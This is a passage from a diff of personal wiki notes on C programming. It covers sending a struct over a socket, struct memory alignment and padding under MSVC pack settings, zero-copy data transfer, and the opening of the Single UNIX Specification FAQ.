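UsrData recvUser;
recv( m_socket, buffer, sizeof(buffer), 0 );
memcpy( &recvUser, buffer, sizeof(recvUser) );    // copy only sizeof(recvUser) bytes; copying sizeof(buffer) would overflow recvUser

recvUser now holds the same data as sendUser. The reason is simple: the memory of a struct object is contiguous and each member has a fixed-size slot, so once the receiver has received all the bytes of the struct, it has all the data. It is simple, but quite useful.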
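One detail the snippet above glosses over is that recv() on a stream socket may return fewer bytes than requested, so robust code loops until the whole struct has arrived. The sketch below assumes a POSIX system and uses a local socketpair() in place of a real connection; recv_all and usrdata_roundtrip are hypothetical helper names, and error handling is kept minimal (for example, an interrupted call is simply treated as a failure).

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

struct UsrData {
    char usr_id[16];
    char usr_pwd[16];
    char usr_nickname[16];
};

/* Reads exactly len bytes from fd. Returns 0 on success, -1 on error or early close. */
int recv_all(int fd, void *buf, size_t len)
{
    char *p = buf;
    while (len > 0) {
        ssize_t n = recv(fd, p, len, 0);
        if (n <= 0)
            return -1;
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Demo over a local socket pair: sends one UsrData and checks that it arrives intact.
   Returns 0 if the received bytes match what was sent. */
int usrdata_roundtrip(void)
{
    int sv[2];
    struct UsrData tx, rx;
    int ok;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    memset(&tx, 0, sizeof tx);               /* no stray bytes on the wire */
    strcpy(tx.usr_id, "100001");
    strcpy(tx.usr_pwd, "123456");
    strcpy(tx.usr_nickname, "Rock");

    ok = send(sv[0], &tx, sizeof tx, 0) == (ssize_t)sizeof tx
         && recv_all(sv[1], &rx, sizeof rx) == 0
         && memcmp(&tx, &rx, sizeof tx) == 0;
    close(sv[0]);
    close(sv[1]);
    return ok ? 0 : -1;
}
```

UsrData contains only char arrays, so it has no padding and no byte-order issues; structs with wider members need the alignment care described in the neighboring notes.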
|
||||
|
||||
@@ -0,0 +1,281 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T13:47:20+08:00
|
||||
|
||||
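====== The hard-to-understand "Memory Alignment and the Memory Layout of struct Data in ANSI C" ======
Created Sunday 05 June 2011

When you define a structure type in C, is its size equal to the sum of the sizes of its fields? How does the compiler place the fields in memory? What does ANSI C require of a structure's memory layout? And can our programs rely on that layout? These questions may be a little hazy for many readers, so this article tries to uncover what lies behind them.

First, one thing is certain: ANSI C guarantees that the fields of a structure appear in memory at addresses that increase in declaration order, and that the address of the first field equals the address of the whole structure instance. Take this structure, for example: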
|
||||
|
||||
struct vector{int x,y,z;} s;
int *p,*q,*r;
struct vector *ps;

p = &s.x;
q = &s.y;
r = &s.z;
ps = &s;

assert(p < q);
assert(p < r);
assert(q < r);
assert((int*)ps == p);
// none of the assertions above can fail
|
||||
|
||||
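At this point someone may ask: "**Does the standard require adjacent fields to be adjacent in memory**?" Sorry, ANSI C makes no such guarantee, and your program should never rely on that assumption. Does that mean we can never draw a clearer, more precise picture of a structure's memory layout? Of course not. But let us step away from that question for a moment and look at another important issue: memory alignment.

Many real computer systems **restrict where basic-type data may be placed in memory**: they require the start address of such data to be a multiple of some number k (usually 4 or 8). This is __memory alignment__, and k is called the __alignment modulus__ of the data type. When the ratio of the alignment modulus of a type S to that of a type T is an integer greater than 1, we say that S has a stronger (__stricter__) alignment requirement than T, and that T has a weaker (__looser__) one than S. This requirement simplifies the design of the transfer path between processor and memory, and it speeds up data access. Consider a processor that always reads or writes memory starting at an address that is a multiple of 8, 8 bytes at a time. If software guarantees that every double starts at a multiple of 8, reading or writing a double takes a single memory operation. Otherwise it may take two, because the data may straddle two aligned 8-byte blocks. Some processors fault when data is misaligned, whereas Intel's IA32 processors work correctly whether or not data is aligned. Intel nevertheless advises that, for best performance, __all program data should be aligned wherever possible__.

The Microsoft C compiler on Win32 (cl.exe for 80x86) uses the following rule by default: **the alignment modulus of any basic type T is the size of T**, that is, sizeof(T). A double (8 bytes), for example, must always be at an address that is a multiple of 8, while a char (1 byte) may start at any address. GCC on Linux follows a different set of rules (found in references and not verified; corrections are welcome): see [[../C语言:内存字节对齐详解.txt]].

__As this shows, different compilers handle data alignment differently, so the size and memory layout of a structure defined in a program compiled on Windows may differ from those on Linux. One remedy is to use compiler directives to force the effective alignment modulus to be the same.__

Now back to struct. ANSI C specifies that __the size of a structure type is the sum of the sizes of all its fields plus the padding between fields or after the last field (tail padding is added to satisfy the alignment requirement of the last member or of the structure itself)__. Padding? Yes: extra space allocated to the structure so that its fields meet their alignment requirements. Does the structure itself have an alignment requirement? It does. ANSI C specifies that __the alignment requirement of a structure type must be no looser than that of its strictest field (that is, the member with the largest alignment modulus)__; it may be stricter, though this is not required, and VC7.1 simply makes them equally strict. Let us look at an example (all experiments below use Intel Celeron 2.4G + WIN2000 PRO + vc7.1, with the alignment option left at "default", that is, no /Zp or /pack option specified):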
|
||||
|
||||
typedef struct ms1
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
} MS1;
|
||||
|
||||
Suppose MS1 were laid out in memory as follows (in all diagrams in this article, addresses increase from left to right):
|
||||
_____________________________
|
||||
| | |
|
||||
| a | b |
|
||||
| | |
|
||||
+---------------------------+
|
||||
Bytes: 1 4
|
||||
|
||||
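Because the field of MS1 with the strictest alignment requirement is b (an int), the compiler's alignment rule and ANSI C together imply that the start address of an MS1 object must be a multiple of 4 (the alignment modulus of int). Can b in the layout above satisfy the alignment requirement of int, given that the structure itself is aligned (that is, starts at a multiple of 4)? Of course not. If you were the compiler, how would you arrange things to satisfy the CPU's preferences? After a grueling millisecond of thought, you would surely arrive at the following scheme: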
|
||||
|
||||
_______________________________________
|
||||
| |\\\\\\\\\\\| |
|
||||
| a |\\padding\\ | b |
|
||||
| |\\\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 3 4
|
||||
|
||||
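This scheme allocates 3 extra padding bytes between a and b, so that whenever the start address of the whole struct object is 4-byte aligned, b is guaranteed to meet the 4-byte alignment of int. sizeof(MS1) is then clearly 8, and **the offset of b from the start of the structure is 4**. Easy enough, right? Now let us swap the order of the fields in MS1: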
|
||||
|
||||
typedef struct ms2
|
||||
{
|
||||
int a;
|
||||
char b;
|
||||
} MS2;
|
||||
|
||||
You might think MS2 is simpler than MS1 and that its layout should be
|
||||
|
||||
_______________________
|
||||
| | |
|
||||
| a | b |
|
||||
| | |
|
||||
+---------------------+
|
||||
Bytes: 4 1
|
||||
|
||||
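Since an MS2 object must also satisfy 4-byte alignment, and the address of a equals the start address of the structure, a is certainly 4-byte aligned. That reasoning is sound but incomplete. Consider what happens when we define **an array of MS2**. The C standard guarantees that **the space occupied by an array of any type (including user-defined structure types) equals the size of one element multiplied by the number of elements**. In other words, __there are no gaps between array elements__. Under the scheme above, an MS2 array named array would be laid out as:

|<- array[0] ->|<- array[1] ->|<- array[2] .....
__________________________________________________________
| | | | |
| a | b | a | b |.............
| | | | |
+----------------------------------------------------------
Bytes: 4 1 4 1

When the array's start address is 4-byte aligned, array[0].a is 4-byte aligned too, but what about array[1].a? And array[2].a ...? This scheme **cannot make the fields of every element meet their alignment requirements when a structure array is defined**, so it must be changed to: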
|
||||
|
||||
___________________________________
|
||||
| | |\\\\\\\\\\\|
|
||||
| a | b |\\padding\\|
|
||||
| | |\\\\\\\\\\\|
|
||||
+---------------------------------+
|
||||
Bytes: 4 1 3
|
||||
|
||||
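Now, whether we define a single MS2 variable or an MS2 array, every field of every element is guaranteed to meet its alignment requirement. sizeof(MS2) is therefore also 8, with a at offset 0 and b at offset 4.

Good. Now that you know the basic rules of structure layout, try analyzing a slightly more complex type.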
|
||||
|
||||
typedef struct ms3
|
||||
{
|
||||
char a;
|
||||
short b;
|
||||
double c;
|
||||
} MS3;
|
||||
|
||||
You will no doubt arrive at the following correct layout:
|
||||
|
||||
padding
|
||||
|
|
||||
_____v_________________________________
|
||||
| |\| |\\\\\\\\\| |
|
||||
| a |\ | b |\padding\| c |
|
||||
| |\| |\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 1 2 4 8
|
||||
|
||||
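sizeof(short) is 2, so b must start at an even address and one byte of padding follows a. sizeof(double) is 8, so c must start at a multiple of 8; the fields a and b plus the padding byte already occupy 4 bytes, so 4 more bytes of padding after b satisfy the alignment requirement of c. __sizeof(MS3) is 16__, the offset of b is 2, and the offset of c is 8. Next, consider a structure that has a field which is itself a structure: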
|
||||
|
||||
typedef struct ms4
|
||||
{
|
||||
char a;
|
||||
MS3 b;
|
||||
} MS4;
|
||||
|
||||
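The field of MS3 with the strictest requirement is c, so __the alignment modulus of MS3 is the same as that of double__ (8). The field a must be followed by 7 padding bytes, so the layout of MS4 is: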
|
||||
_______________________________________
|
||||
| |\\\\\\\\\\\| |
|
||||
| a |\\padding\\ | b |
|
||||
| |\\\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 7 16
|
||||
|
||||
Clearly sizeof(MS4) is 24 and the offset of b is 8.
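The four layouts above can be checked on your own compiler with offsetof, sizeof, and the C11 _Alignof operator. This is only a sketch: the helper ms2_stride is a hypothetical name, and the exact numbers for MS3 and MS4 depend on the platform (the 16 and 24 above assume that double is 8-byte aligned, which is not the case for GCC on 32-bit x86 Linux).

```c
#include <assert.h>
#include <stddef.h>

typedef struct ms1 { char a; int b; } MS1;
typedef struct ms2 { int a; char b; } MS2;
typedef struct ms3 { char a; short b; double c; } MS3;
typedef struct ms4 { char a; MS3 b; } MS4;

/* Distance in bytes between consecutive elements of an MS2 array.
   It always equals sizeof(MS2), because arrays have no gaps between elements. */
size_t ms2_stride(void)
{
    MS2 array[2];
    size_t stride = (size_t)((char *)&array[1] - (char *)&array[0]);
    assert(stride == sizeof(MS2));
    return stride;
}
```

Printing offsetof(MS3, c) and sizeof(MS4) with different /Zp or #pragma pack settings is an easy way to do the review exercise suggested in this article.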
|
||||
|
||||
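In real development, the __/Zp__ compiler option changes the compiler's alignment rule. Specifying /Zpn (in VC7.1 n can be 1, 2, 4, 8, or 16) tells the compiler that **the maximum alignment modulus is n**. In that case, **basic types of n bytes or fewer are aligned exactly as by default**, while types larger than n bytes have their alignment modulus capped at n. In fact, the default alignment of VC7.1 is equivalent to __/Zp8__. A close look at the MSDN description of this option shows that it solemnly warns programmers not to use /Zp1 and /Zp2 on MIPS and Alpha platforms, nor /Zp4 and /Zp8 on 16-bit platforms (think about why). Changing the compiler's alignment option and re-analyzing the four structures above against actual program output makes a good review exercise.

We can now answer the last question posed by this article. __A structure's memory layout depends on the CPU, the operating system, the compiler, and the alignment options used at compile time__. Your program may need to run on several platforms, and your source may be compiled by different people with different compilers (imagine shipping an open-source library), so unless it is absolutely necessary, __your program should never depend on these quirks of memory layout__. Incidentally, if two modules of one program are compiled with different alignment options, very subtle bugs are likely to result. If your program behaves in ways that are truly hard to explain, it is worth checking the compile options of each module.

Exercise: analyze the memory layout of the following structures on your platform, and try to find a sensible way of ordering field declarations that saves as much memory as possible.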
|
||||
|
||||
A. struct P1 { int a; char b; int c; char d; };
|
||||
B. struct P2 { int a; char b; char c; int d; };
|
||||
C. struct P3 { short a[3]; char b[3]; };
|
||||
D. struct P4 { short a[3]; char *b[3]; };
|
||||
E. struct P5 { struct P2 *a; char b; struct P1 c[2]; };
|
||||
|
||||
|
||||
|
||||
Author's blog: http://blog.csdn.net/soloist/
|
||||
---------------------------------------------------------------------------------
|
||||
Question: how can the following experiment be explained?

#pragma pack(push, 2)
struct s
{
    char a;
};
#pragma pack (pop)

void TestPack()
{
    s c[2];
    assert(sizeof(s)==1);
    assert(sizeof(c)==2);
}

int _tmain(int argc, _TCHAR* argv[])
{
    TestPack();
    return 0;
}
|
||||
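Answer:

Every basic data type has an alignment modulus. By default, the Microsoft C compiler on Win32 (cl.exe for 80x86) uses the rule: **the alignment modulus of any basic type T is the size of T, that is, sizeof(T)**.

One possible set of alignment moduli:

Type     Modulus
------------------
char     1
short    2
int      4
double   8

**ANSI C specifies that the size of a structure type is the sum of the sizes of all its fields plus the padding between fields or after the last field.**

Note: padding is the extra space allocated to a structure so that its fields meet their alignment requirements.

When padding arises:

Padding can appear only when the alignment moduli of two member types S and T in a structure differ.

When we set the alignment modulus with the compiler option __/Zpn or with #pragma pack(push, n)__, the padding is affected only when the alignment modulus of some basic type in the structure is __greater than n__; otherwise each member is aligned according to the modulus of its own type.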
|
||||
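Examples:

When n = 1:

#pragma pack(push,1)
typedef struct ms3{char a; short b; double c; } MS3;
#pragma pack(pop)

Here n = 1. In this structure the alignment modulus of short is 2 and that of double is 8, both greater than n, so the offsets of these two members are affected: they only have to be multiples of n. The alignment modulus of char is 1, which is less than or equal to n, so it is aligned by its own modulus 1.

Because n = 1, the three members are contiguous in memory and there is no padding. The layout is: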
|
||||
___________________________
|
||||
| a | b | c |
|
||||
+-------------------------+
|
||||
Bytes: 1 2 8
|
||||
|
||||
sizeof(MS3) = 11
|
||||
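When n = 2:

#pragma pack(push,2)
typedef struct ms3{char a; short b; double c; } MS3;
#pragma pack(pop)

Here n = 2. In this structure the alignment modulus of double is 8, which is greater than n, so the offset of this member is affected: it only **has to be a multiple of n**. The alignment moduli of char and short are less than or equal to n, so they are aligned **by their own moduli**, 1 and 2 respectively. The layout is: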
|
||||
____________________________
|
||||
| a |\| b | c |
|
||||
+---------------------------+
|
||||
Bytes: 1 1 2 8
|
||||
|
||||
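Here the offset of c is 4, a multiple of n = 2. Offsets of 6, 8, and so on would satisfy the condition too, but the compiler is not foolish enough to waste space for nothing.

sizeof(MS3) = 12

When n = 4: the result is the same as for n = 2.

When n = 8:

#pragma pack(push,8)
typedef struct ms3{char a; short b; double c; } MS3;
#pragma pack(pop)

Here n = 8. The alignment moduli of char, short, and double in this structure are all less than or equal to n, so each member is aligned by its own modulus: 1, 2, and 8 respectively. That is, the offset of the short must be a multiple of 2, and the offset of the double must be __a multiple of 8__.

The layout is: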
|
||||
_______________________________________
|
||||
| a |\| b |\padding\| c |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 1 2 4 8
|
||||
|
||||
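Here the offset of a is 0, which is of course a multiple of 1, the alignment modulus of char.

For the offset of b to be a multiple of 2, the alignment modulus of short, at least 1 byte of padding must be added between a and b, because a occupies the first byte.

For the offset of c to be a multiple of 8, the alignment modulus of double, at least 4 more bytes of padding are needed, because a, the 1 padding byte, and b together already occupy 4 bytes.

sizeof(MS3) = 16

When n = 16: the result is the same as for n = 8.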
|
||||
====================================================
|
||||
By the analysis above, for the structure defined as

#pragma pack(push, 2)
struct s
{
    char a;
};
#pragma pack (pop)

the alignment modulus of char is 1, which is less than n = 2, so the member is aligned by its own modulus. **There is no padding at all**, so sizeof(s) = 1. For s c[2], sizeof(c) == 2 follows necessarily.
|
||||
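Now consider the following structure:

#pragma pack(push, n)//n=(1,2,4,8,16)
struct s
{
    double a;
    double b;
    double c;
};
#pragma pack (pop)

For a structure like this, the alignment modulus set with pack never affects the size; that is, there is no padding.

The alignment modulus of double is 8.

When n < 8, the rule stated earlier applies (padding is affected only when the alignment modulus of some basic type in the structure is greater than n). But whatever n is (1, 2, or 4), the offset of every double is already a multiple of n, so no padding is needed. When n >= 8, the members are simply aligned by the modulus of double. Because all the members have the same type, there is no padding between them in memory.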
|
||||
---------------------------------------------------------------------------------------------------------------------
|
||||
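One more point:

__If you order the members carefully when defining a structure and make the padding explicit where appropriate, the resulting memory layout can be made independent of the /Zpn option or of pack.__

For example:

typedef struct ms1{ char a; char b; int c; short d; } MS1;

Under different /Zpn settings, sizeof(MS1) may differ; that is, the memory layout differs.

If it is changed to

typedef struct ms2{ char a; char b; short d; int c; } MS2;

the compiler always generates the same memory layout, whatever the /Zpn or pack setting.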
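This claim is easy to test by compiling both member orders under two different pack settings. The sketch below assumes a compiler that supports #pragma pack(push, n) and the usual sizes (short 2 bytes, int 4 bytes); the suffixed struct names and ms2_layout_is_stable are hypothetical, introduced only so that all four variants can coexist in one file.

```c
#include <assert.h>
#include <stddef.h>

#pragma pack(push, 1)
struct ms1_pack1 { char a; char b; int c; short d; };
struct ms2_pack1 { char a; char b; short d; int c; };
#pragma pack(pop)

#pragma pack(push, 4)
struct ms1_pack4 { char a; char b; int c; short d; };
struct ms2_pack4 { char a; char b; short d; int c; };
#pragma pack(pop)

/* Returns 1 if the reordered struct has the same size and member offsets
   under both pack settings, 0 otherwise. */
int ms2_layout_is_stable(void)
{
    return sizeof(struct ms2_pack1) == sizeof(struct ms2_pack4)
        && offsetof(struct ms2_pack1, d) == offsetof(struct ms2_pack4, d)
        && offsetof(struct ms2_pack1, c) == offsetof(struct ms2_pack4, c);
}
```

The original order changes size between the two settings, while the reordered one does not, because every member already sits at an offset that is a multiple of its own size.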
|
||||
|
||||
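Another example:

typedef struct ms3{ char a; char b; int c; } MS3;

can be rewritten as:

typedef struct ms4{ char a; char b; short padding; int c; } MS4;    // __the padding is written out explicitly__

__(Removing the hazard in the source code itself is more reliable and more portable than depending on compiler options; good code should do this.)__

(Another benefit of reducing implicit padding is lower memory use; when there are very many instances of a structure, the savings can be considerable.)

(The variable and structure names above do not follow any naming convention; they are for illustration only and should not be imitated.)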
|
||||
@@ -0,0 +1,48 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:16:15+08:00
|
||||
|
||||
====== Data transfer ---The traditional approach ======
|
||||
Created Saturday 04 June 2011
|
||||
http://www.ibm.com/developerworks/linux/library/j-zerocopy/
|
||||
Many Web applications serve a significant amount of static content, which amounts to reading data off of a disk and writing the exact same data back to the response socket. This activity might appear to require relatively little CPU activity, but it's somewhat inefficient: the kernel reads the data off of disk and pushes it across the kernel-user boundary to the application, and then the application pushes it back across the kernel-user boundary to be written out to the socket. In effect, the application serves as an inefficient intermediary that gets the data from the disk file to the socket.
|
||||
|
||||
Each time data traverses the user-kernel boundary, it must be copied, which consumes CPU cycles and memory bandwidth. Fortunately, you can eliminate these copies through a technique called — appropriately enough — zero copy. Applications that use zero copy request that the kernel copy the data directly from the disk file to the socket, without going through the application. Zero copy greatly improves application performance and reduces the number of context switches between kernel and user mode.
|
||||
|
||||
The Java class libraries support zero copy on Linux and UNIX systems through the transferTo() method in java.nio.channels.FileChannel. You can use the transferTo() method to transfer bytes directly from the channel on which it is invoked to another writable byte channel, without requiring data to flow through the application. This article first demonstrates the overhead incurred by simple file transfer done through traditional copy semantics, then shows how the zero-copy technique using transferTo() achieves better performance.
|
||||
|
||||
Data transfer: The traditional approach
|
||||
|
||||
Consider the scenario of reading from a file and transferring the data to another program over the network. (This scenario describes the behavior of many server applications, including Web applications serving static content, FTP servers, mail servers, and so on.) The core of the operation is in the two calls in Listing 1 (see Download for a link to the complete sample code):
|
||||
|
||||
Listing 1. Copying bytes from a file to a socket
|
||||
|
||||
File.read(fileDesc, buf, len);
|
||||
Socket.send(socket, buf, len);
|
||||
|
||||
|
||||
Although Listing 1 is conceptually simple, internally, the copy operation requires four context switches between user mode and kernel mode, and the data is copied four times before the operation is complete. Figure 1 shows how data is moved internally from the file to the socket:
|
||||
|
||||
Figure 1. Traditional data copying approach
|
||||
{{./figure1.gif}}
|
||||
Figure 2 shows the context switching:
|
||||
|
||||
Figure 2. Traditional context switches
|
||||
{{./figure2.gif}}
|
||||
The steps involved are:
|
||||
|
||||
The read() call causes a context switch (see Figure 2) from user mode to kernel mode. Internally a sys_read() (or equivalent) is issued to read the data from the file. The first copy (see Figure 1) is performed by the direct memory access (DMA) engine, which reads file contents from the disk and stores them into a kernel address space buffer.
|
||||
|
||||
The requested amount of data is copied from the read buffer into the user buffer, and the read() call returns. The return from the call causes another context switch from kernel back to user mode. Now the data is stored in the user address space buffer.
|
||||
|
||||
The send() socket call causes a context switch from user mode to kernel mode. A third copy is performed to put the data into a kernel address space buffer again. This time, though, the data is put into a different buffer, one that is associated with the destination socket.
|
||||
|
||||
The send() system call returns, creating the fourth context switch. Independently and asynchronously, a fourth copy happens as the DMA engine passes the data from the kernel buffer to the protocol engine.
|
||||
|
||||
Use of the intermediate kernel buffer (rather than a direct transfer of the data into the user buffer) might seem inefficient. But intermediate kernel buffers were introduced into the process to improve performance. Using the intermediate buffer on the read side allows the kernel buffer to act as a "readahead cache" when the application hasn't asked for as much data as the kernel buffer holds. This significantly improves performance when the requested data amount is less than the kernel buffer size. The intermediate buffer on the write side allows the write to complete asynchronously.
|
||||
|
||||
Unfortunately, this approach itself can become a performance bottleneck if the size of the data requested is considerably larger than the kernel buffer size. The data gets copied multiple times among the disk, kernel buffer, and user buffer before it is finally delivered to the application.
|
||||
|
||||
Zero copy improves performance by eliminating these redundant data copies.
|
||||
|
7
Zim/Programme/APUE/FAQ.txt
Normal file
@@ -0,0 +1,7 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:05:21+08:00
|
||||
|
||||
====== FAQ ======
|
||||
Created Tuesday 07 June 2011
|
||||
|
||||
@@ -0,0 +1,610 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T12:33:20+08:00
|
||||
|
||||
====== Single UNIX Specification Frequently Asked Questions (FAQ Version 1.9) ======
|
||||
Created Tuesday 07 June 2011
|
||||
http://www.opengroup.org/austin/papers/single_unix_faq.html
|
||||
|
||||
Single UNIX Specification Frequently Asked Questions (FAQ Version 1.9)
|
||||
|
||||
Last Updated : Oct 28 2004: freq.ques,v 1.9
|
||||
|
||||
This is the Frequently Asked Questions file for the Single UNIX Specification. Its maintainer is Andrew Josey (ajosey at The Open Group ). Suggestions and contributions are always welcome.
|
||||
|
||||
This document can be found on the world wide web at http://www.opengroup.org/austin/papers/single_unix_faq.html.
|
||||
|
||||
UNIX® is a registered trademark of The Open Group in the USA and other countries.
|
||||
|
||||
The Open Group holds the definition of what a UNIX system is and its associated trademark in trust for the industry. The official web site for more information is http://www.unix.org.
|
||||
|
||||
This article includes answers to the following.
|
||||
|
||||
|
||||
Q0. What is the Single UNIX Specification?
|
||||
Q1. What is The Open Group Base Working Group ?
|
||||
Q2. What is the Austin Group?
|
||||
Q3. What is the latest version of the Single UNIX Specification?
|
||||
Q4. Where can I read/download the Single UNIX Specification Version 3 from? Is there a book?
|
||||
Q5. Where can I read/download earlier versions of the Single UNIX Specification from?
|
||||
Q6. How do I become a participant in the Working Groups?
|
||||
Q7. What is covered in the Base Definitions Technical Standard (XBD)?
|
||||
Q8. What is covered in the System Interfaces Technical Standard (XSH)?
|
||||
Q9. What is covered in the Shell and Utilities Technical Standard (XCU)?
|
||||
Q10. What is covered in the Rationale Technical Standard (XRAT)?
|
||||
Q11. What is covered in the X/Open Curses Specification (XCURSES)?
|
||||
Q12. How many APIs are there? Is there a list of APIs?
|
||||
Q13. What Options are there in the Version 3 Specification?
|
||||
Q14. What are the required directories and devices?
|
||||
Q15. What regular expressions are supported?
|
||||
Q16. How should I compile a conforming program?
|
||||
Q17. What is the Relationship to the ISO C Standard?
|
||||
Q18. What happened to the Networking Services Specification (XNS)?
|
||||
Q19. What System Interfaces are included by Category?
|
||||
Q20. What is the history of the development of the Single UNIX Specification?
|
||||
Q21. How does the Single UNIX Specification compare to the Linux Standard Base?
|
||||
Q22. What are the core technical changes in the latest version of the Single UNIX Specification?
|
||||
Q23. Does removal of obsolescent utility syntax mean that implementations supporting usages of head -5 file, tail -5 file, tail -l file are no longer allowed?
|
||||
Q24. Does an operating system have to be derived from AT&T/SCO code to meet the Single UNIX Specification?
|
||||
Q25. What about UNIX Certification?
|
||||
Q26. Where can I get a UNIX License Plate from?
|
||||
Q27. How do I get permission to excerpt materials from the standard for reuse in my product?
|
||||
Q28. How do I add a question to this FAQ?
|
||||
|
||||
Q0. What is the Single UNIX Specification?
|
||||
|
||||
The Single UNIX Specification is a set of open, consensus specifications that define the requirements for a conformant UNIX system. The standardized programming environment provides a broad-based functional set of interfaces to support the porting of existing UNIX applications and the development of new applications. The environment also supports a rich set of tools for application development.
|
||||
|
||||
The Single UNIX Specification came into being when in 1994 Novell (who had acquired the UNIX systems business of AT&T/USL) decided to get out of that business. Rather than sell the business as a single entity, Novell transferred the rights to the UNIX trademark and the specification (that subsequently became the Single UNIX Specification) to The Open Group (at the time X/Open Company). Subsequently, it sold the source code and the product implementation (UNIXWARE) to SCO. The Open Group also owns the trademark UNIXWARE, transferred to them from SCO more recently.
|
||||
|
||||
Q1. What is The Open Group Base Working Group ?
|
||||
|
||||
The Open Group's Base Working Group is the group that has developed, and continues to develop, the technical specifications that make up the Single UNIX Specification. More information can be found at http://www.opengroup.org/platform/ . The Base Working Group is one of the three parties involved in the Austin Group that maintain the Base Specifications of the Single UNIX Specification Version 3, which are also IEEE Std 1003.1 (POSIX) and ISO/IEC 9945.
|
||||
Q2. What is the Austin Group?
|
||||
|
||||
The Austin Common Standards Revision Group (CSRG) is a joint technical working group established to develop and maintain the core volumes of the Single UNIX Specification, which are also the POSIX 1003.1 standard and ISO/IEC 9945. Anyone wishing to participate in the Austin Group can do so. There are no fees for participation or membership. You may participate as an observer or as a contributor. You do not have to attend face-to-face meetings to participate; electronic participation is most welcome.
|
||||
|
||||
See http://www.opengroup.org/austin/ for more information.
|
||||
|
||||
See http://www.opengroup.org/austin/faq.html for the Austin Group FAQ.
|
||||
|
||||
Q3. What is the latest version of the Single UNIX Specification?
|
||||
|
||||
The latest version is the Single UNIX Specification Version 3. The 2004 edition of the Single UNIX Specification was published on April 30th 2004, and updates the 2001 and 2003 editions of the specification to include Technical Corrigendum 1 (TC1) and Technical Corrigendum 2 (TC2). It consists of The Open Group Base Specifications Issue 6 and the X/Open Curses, Issue 4, Version 2 specification.
|
||||
|
||||
The Single UNIX Specification uses The Open Group Base Specifications, Issue 6 documentation as its core. The documentation is structured as follows:
|
||||
|
||||
Base Definitions, Issue 6 (XBD)
|
||||
Shell and Utilities, Issue 6 (XCU)
|
||||
System Interfaces, Issue 6 (XSH)
|
||||
Rationale (Informative)
|
||||
|
||||
New for this version of the Single UNIX Specification is the incorporation of IEEE Std 1003.1 (POSIX) and ISO/IEC 9945 into the document set; The Open Group Base Specifications, Issue 6, ISO/IEC 9945 and IEEE Std 1003.1, 2004 Edition are technically identical. The base document for the joint revision of the documents was The Open Group's Base volumes of its Single UNIX Specification, Version 2. These were selected since they were a superset of the existing POSIX.1 and POSIX.2 specifications and had some organizational aspects that would benefit the audience for the new revision.
|
||||
|
||||
Detailed information on the Single UNIX Specification, including accessing the version 3 specification in html is available at http://www.unix.org/version3/
|
||||
|
||||
Q4. Where can I read/download the Single UNIX Specification Version 3 from? Is there a book?
|
||||
|
||||
The HTML version of the latest version (which incorporates Technical Corrigendum 1) is available to read and download from: URL:http://www.unix.org/version3/ (you need to register for a copy).
|
||||
|
||||
A summary of the changes in Technical Corrigendum 1 is available from: URL:http://www.opengroup.org/austin/docs/austin_155.txt.
|
||||
|
||||
The pdf text of just the Technical Corrigendum 1 (changes to the 2001 edition) is available from: URL: http://www.opengroup.org/pubs/catalog/u057.htm .
|
||||
|
||||
The pdf text of just the Technical Corrigendum 2 (changes to both the 2001 and 2003 editions) is available from: URL: http://www.opengroup.org/pubs/catalog/u059.htm .
|
||||
|
||||
A summary of the changes in Technical Corrigendum 2 is available from: URL:http://www.opengroup.org/austin/docs/austin_206.txt.
|
||||
|
||||
The complete specification in PDF format is available to members of The Open Group from The Open Group publications catalog. If you wish to sign up your organization as a member of The Open Group and are an active participant in the Austin Group, you can sign up for no fee at http://www.opengroup.org/austin/ogmembers/ (note this is for companies and organizations only). If you want to join as an individual, or are working on standardization activities and need a copy to assist you in your work, please contact Andrew Josey directly; he can then add you as an individual affiliate member.
|
||||
|
||||
Ongoing draft specifications for future technical corrigenda are available online from the Austin Group web site at http://www.opengroup.org/austin/ . You need to be a member of the Austin Group. Information on how to join the group is on the web site.
|
||||
|
||||
URL:http://www.opengroup.org/austin/. (Austin Group Home Page)
|
||||
|
||||
Periodically The Open Group does hardcopy runs of the complete 4000-page specification on request. Check the Open Group publications catalog for availability (http://www.opengroup.org/publications/). The Open Group also produces a number of Guide Books, including The Single UNIX Specification Version 3 on CDROM, The Authorized Guide (http://www.unix.org/version3/theguide.html), and the UNIX Internationalization Guide (this is the latest) (http://www.opengroup.org/publications/catalog/g032.htm).
|
||||
|
||||
Q5. Where can I read/download earlier versions of the Single UNIX Specification from?
|
||||
|
||||
The specifications that make up the original Single UNIX Specification (1994) and the Single UNIX Specification Version 2 (1997), and other related specifications, can be downloaded in PDF, and HTML where available, from The Open Group publications catalog at http://www.opengroup.org/publications/catalog/un.htm.
|
||||
|
||||
Q6. How do I become a participant in the Working Groups?
|
||||
|
||||
To participate in the Austin Group just join the open mailing list. See http://www.opengroup.org/austin/lists.html for more information.
|
||||
|
||||
URL:http://www.opengroup.org/austin/lists.html. (How to Join the Austin Group)
|
||||
|
||||
If you want to join the Base Working Group please contact Andrew Josey for further information.
|
||||
|
||||
Q7. What is covered in the Base Definitions Technical Standard (XBD)?
|
||||
|
||||
The XBD document is part of the Base Specifications, Issue 6. XBD provides common definitions for the Base Specifications of the Single UNIX Specification; therefore readers should be familiar with it before using the other parts of the Single UNIX Specification. The presence of this document reduces duplication in the other related parts of the Single UNIX Specification and ensures consistent use of terminology.
|
||||
|
||||
This document is structured as follows:
|
||||
|
||||
Chapter 1 is an introduction which includes the scope of the Base Specifications, and the scope of the changes made in this revision. Normative references, terminology, and portability codes used throughout the Base Specifications are included in this chapter.
|
||||
|
||||
